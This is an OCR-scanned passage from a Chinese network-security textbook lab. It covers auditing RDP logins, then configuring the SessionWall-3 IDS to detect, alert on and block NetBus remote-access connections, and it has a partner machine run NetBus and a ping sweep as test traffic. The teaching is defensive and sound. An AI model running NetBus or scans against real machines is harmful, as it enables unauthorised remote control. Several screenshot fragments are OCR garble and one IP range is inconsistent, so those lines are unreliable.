(3) 然后 审核 它 的 “连接 ”“ 断 开 ”“ 注 销 ” 的 成 功 和 “登录 ”的 成 功 和 失败 就 足够 了 ,如 
图 9.189 所 示 。 

(4) 打开 事件 查看 器 ,如 图 9. 190 所 示 。 

下 面 建立 一 个 bat 文件 ,叫做 TSLog. bat, 这 个 文件 用 来 记录 登录 者 的 IP, 内 容 如 下 : 

time /t >> TSLog. log 


netstat -n - p tcp | find ": 3389"»» TSLog. log 
start Explorer 


RDP-Tcp 的 审 楼 项 目 ixi 


x | 
am een 
应 用 到 如 ): [vrns x 


agassagsnags 


aaganaanan|i 


图 9.189 审核 图 9. 190 打开 事件 查看 器 


实验 十 三 ”SessionWall 入 侵 检 测 


实验 名 称 : SessionWall 的 实时 入 侵 检测 。 
实验 目的 : 了 " IDS 的 原理 ,并 掌握 CA Session Wall 产品 的 配置 和 使 用 。 


实验 环境 : 安装 Windows 系统 , SessionWall-3 检测 软件 ,配合 检测 的 伙伴 机 一 台 


(Windows 系统 ) 。 
实验 步骤 如 下 。 


任务 一 使 用 SessionWall 进行 实时 入 侵 检 测 


CD 执行 “开始 ">" 程序 ”>SessionWall->SessionWall-3 命令 ,打开 SessionWall 对 话 


框 , 如 图 9.191 所 示 。 
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图 9.191 打开 SessionWall 对 话 框 
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(2) 在 乙 机 上 ,执行 “开始 ”一 “程序 ”>WS_Ping ProPack— WS Ping ProPack 命令 , 打 
WS Ping ProPack 对 话 框 ,配置 Ping Pro 检测 合作 伙伴 的 系统 ,即将 开始 Address 和 
End Address, 例如 定义 为 192. 168. 1. 100 到 192. 168. 0. 250 ,然后 在 WS_Ping ProPack 对 
话 框 中 选取 Scan 标签 。 各 项 配置 如 图 9. 192 所 示 。 


二 


Ele gdt we 
Info | Time | mL | Ping | TraceRoute | Lookup | Finger | Whois | Im | 
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Timeout: oo scan exit at 192. 168. 0.254 
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[Scan for devices in your network. E 


图 9.192 各 项 配置 


(3) 单 击 Start 按钮 开始 检测 。 
(4) 由 于 合作 双方 进行 同样 的 练习 ,可 以 从 SessionWall 中 看 到 指示 灯 闪 烁 和 流量 增加 
的 信息 ,如 图 9.193 所 示 。 
LÀ 


nns paR ses ngo? 


ed events in the woe window. Select View => Display Logged Events. or View => Display 


rr enr Á 


PE ET EE d eee] B o wea 
图 9.193 看 到 指示 灯 闪 烁 和 流量 增加 的 信息 


(5) 在 SessionWall 的 工具 栏 中 , 单 击 “安全 检测 ”按钮 ,打开 Detected Security 


Violations 窗口 ,如 图 9.194 所 示 。 


Computer Associates SessionWall-3 


: Data Edit View Functions Settings Help 
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图 9.194 Detected Security Violations 窗口 


(6) 关闭 Detected Security Violations 窗口 ,然后 关闭 Session Wall。 
C) 最 后 关闭 Ping Pro. 
SessionWall 可 以 用 来 充当 实时 监测 系统 ,直接 的 图 标 报警 方式 较为 直观 。 


任务 二 ”在 SessionWall 中 创建 ,设置 .编辑 审计 规则 


(1) 打开 SessionWall, 如 图 9. 195 所 示 。 


(2) 在 Functions 菜单 中 选择 Intrusion Attempt Detection Rules 选项 ,如 图 9. 196 


Bim. 


(3) 在 打开 的 Intrusion Attempt Deteation Rules 窗口 中 单 击 左下 角 的 Edit Rules 


New— Insert Before 按钮 ,如 图 9. 197 所 示 。 


(4) 输入 NetBus 作为 标示 名 称 , 按 Enter 键 确 认 , 注 意 以 NetBus 命名 并 不 是 必需 的 ， 


但 可 以 标示 规则 的 功用 ,实验 中 是 用 来 监视 NetBus 活动 的 ,如 图 9. 198 所 示 。 


CO 在 出 现 的 Client 选项 卡 中 ,选择 Range: 这 一 步 是 用 来 确定 规则 所 起 作用 的 主机 的 


IP 地 址 的 范围 的 ,如 图 9. 199 所 示 。 


(6) 单 击 Add 按钮 ,打开 Select Network Object Type 对 话 框 ,选择 RANGE 选项 , 然 


后 单 击 Add 按钮 打开 RANGE Properties 对 话 框 ,如 图 9. 200 所 示 。 
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图 9.195 打开 SessionWall 
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图 9.196 选择 Intrusion Attempt Detection Rules 选项 
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图 9.197 Intrusion Attempt Deteation Rules 窗口 
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图 9.198 输入 NetBus 作为 标示 名 称 
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图 9.199 Client 选项 卡 


CO 将 范围 名 称 命名 为 伙伴 机 的 IP, 分 别 输入 自己 的 IP 地址 和 合作 伙伴 的 IP 地 址 , 然 
后 单 击 OK 按钮 ,再 单 击 Next 按钮 ,将 伙伴 机 的 IP 加 入 其 中 ,如 图 9. 201 和 图 9. 202 所 示 。 
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图 9.200 RANGE Properties 对 话 框 


图 9.201 输入 伙伴 机 的 IP 地 址 
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图 9.202 伙伴 机 加 入 成 功 


(8) 滚动 列表 框 中 各 项 ,找到 Intrusion Detection: NetBus Traffic 项 后 加 亮 显示 ,如 
图 9. 203 所 示 。 
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图 9.203 Intrusion Detection; NetBus Traffic 选项 


(9) 单 击 Properties 按钮 ,显示 该 规则 的 原始 定义 与 设置 , 单 击 OK 按钮 关闭 窗口 ,如 
图 9. 204 所 示 。 
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图 9.204 单 击 Properties 按钮 


(10) f£ Type 对 话 框 中 单 击 Next 按钮 ,如 图 9. 205 所 示 。 

(11) 在 Action 对 话 框 中 ,选择 Log It 图 标 以 记录 netbus 活动 情况 ,如 图 9. 206 所 示 。 

(12) 选择 Properties 选项 ,然后 在 列表 中 选中 Windows NT Event Log 复 选 项 ,输入 一 
个 文本 字符 串 用 来 在 检测 到 netbus 活动 时 发 出 警报 文字 ,然后 单 击 OK 按钮 ,如 图 9. 207 
所 示 。 

(13) 单 击 Next 按钮 ,在 Time 对 话 框 中 ,确保 Always 复 选 框 被 选中 , 单 击 Next 按钮 ， 
如 图 9. 208 和 图 9. 209 所 示 。 
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图 9.206 选择 Log It 图 标 以 记录 netbus 活动 情况 
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图 9.207 输入 警报 文字 
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图 9.209 输入 一 个 描述 名 称 


(14) 在 Description 对 话 框 中 ,输入 一 个 描述 名 称 , 然 后 单 击 Next 按钮 ,如 图 9. 210 所 示 。 
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图 9. 210 登录 名 与 密码 
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(15) 在 Users Properties 对 话 框 中 输入 自己 当前 的 NT 登录 名 与 密码 ,如 图 9. 211 
所 示 。 
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图 9.211  NetBus 规则 


(16) 单 击 “ 完 成 ”按钮 ,在 Intrusion Attempt Detection Rules 对 话 框 中 将 显示 刚 定 义 
的 NetBus 规则 , 单 击 OK 按钮 ,如 图 9. 212 所 示 。 
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图 9.212 View 菜单 


(17) 最 小 化 SessionWall ,打开 NetBus 建立 一 个 连接 ,最 小 化 NetBus, 同 时 最 大 化 
SessionWall。 

(18) 在 View 菜单 中 选择 Alert Message, 或 者 选择 Show Alert Messages 按钮 ,如 
图 9. 213 和 图 9. 214 所 示 。 

(19) 双击 所 显示 的 关于 NetBus 连接 的 警报 信息 ,查看 详细 信息 ,如 果 没 有 显示 ,接着 
做 下 一 步 ,如 图 9. 215 所 示 。 
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K 9.213 列 出 警告 信息 图 9.214 警报 信息 


(20) 打开 Windows NT Event Viewer, 找 到 并 阅读 NetBus 项 。 


(21) 在 SessionWall 中 编辑 规则 禁止 NetBus 连接 , 打开 Functions 菜单 ,选择 


Intrusion Attempt Detection Rules 按钮 。 
(22) 选择 Edit Rule 选项 , 单 击 Action 标签 如 图 9. 215 所 示 。 
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图 9.215 Action 标签 


(23) 选取 Block It 选项 , 单 击 OK 按钮 ,如 图 9.216 所 示 。 
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图 9.216 选取 Block It 选项 
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(24) 可 能 会 出 现 改变 规则 并 终止 已 创建 的 规则 的 警告 ,在 这 里 不 必 理 会 ,除去 选择 过 
的 Log It 选项 之 外 ,还 可 以 使 用 Ignore It 加 以 忽略 ; 使 用 Active HTMLcontent Alert 将 
相关 信息 以 HTML 页 面 方式 记录 并 发 送 ; 或 者 通过 E-mail 方式 发 送 给 特定 的 用 户 或 管理 
员 等 。 选 项 非常 多 ,可 进一步 体会 到 SessionWall IDS 系统 强大 规则 的 定制 功能 。 

(25) 单 击 “ 应 用 ”按钮 ,再 单 击 OK 按钮 。 

(26) 再 次 单 击 OK 按钮 ,规则 就 编辑 完成 了 ,程序 返回 到 SessionWall 主 界面 ,然后 最 
小 化 SessionWall, 如 图 9. 217 所 示 。 
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图 9. 217 SessionWall 主 界面 


(27) 提示 合作 伙伴 试 着 执行 NetBus 命令 ,注意 此 时 已 经 无 法 连接 上 ,因为 刚才 有 关 
NetBus 连接 的 策略 中 使 用 了 Block It, 所 有 在 所 定义 的 地 址 范围 内 的 NetBus 的 连接 企图 
都 将 被 打 断 。 在 IP 地 址 为 192. 168. 0. 2 的 机 器 上 运行 NetBus 程序 ,如 图 9. 218 所 示 。 
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图 9.218 执行 NetBus 命令 


(28) 最 大 化 SessionWall, 查 看 Alert Message 对 话 框 ,双击 有 关 信 息 , 然 后 查看 第 二 项 
和 事件 描述 ,这 时 将 看 到 有 关 NetBus 企图 连接 的 信息 。 

(29) 单 击 Action 标签 中 Properties 按钮 ,编辑 NetBus 规则 ,选中 Sound 图 标 之 后 的 
复 选 框 ,这 样 , 当 有 人 企图 使 用 NetBus 连接 时 ,SessionWall 会 发 出 声音 警告 ,在 这 一 步 ,还 
可 以 设 为 其 他 形式 进行 报警 ,例如 发 送 电子 邮件 .传真 .记录 到 文件 等 多 种 选择 ,或 者 用 
WAV 文件 代替 单一 的 喇叭 报警 声 , 如 图 9. 219 所 示 。 
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图 9.219 Action 标签 


(30) NetBus 中 连接 合作 伙伴 的 系统 ,应 该 能 够 听 到 报警 声 如 何 利用 IDS 审计 当前 网 
络 的 安全 特性 ,怎样 有 针对 性 的 审计 网 络 事件 等 都 需要 制定 详细 的 审计 规则 ,本 实验 描述 的 
有 关内 容 对 于 熟练 使 用 IDS 是 必 备 的 .基础 的 ,同时 也 是 成 为 一 名 合格 的 网 络 安全 审计 人 
员 所 必须 掌握 的 技能 。 


How 
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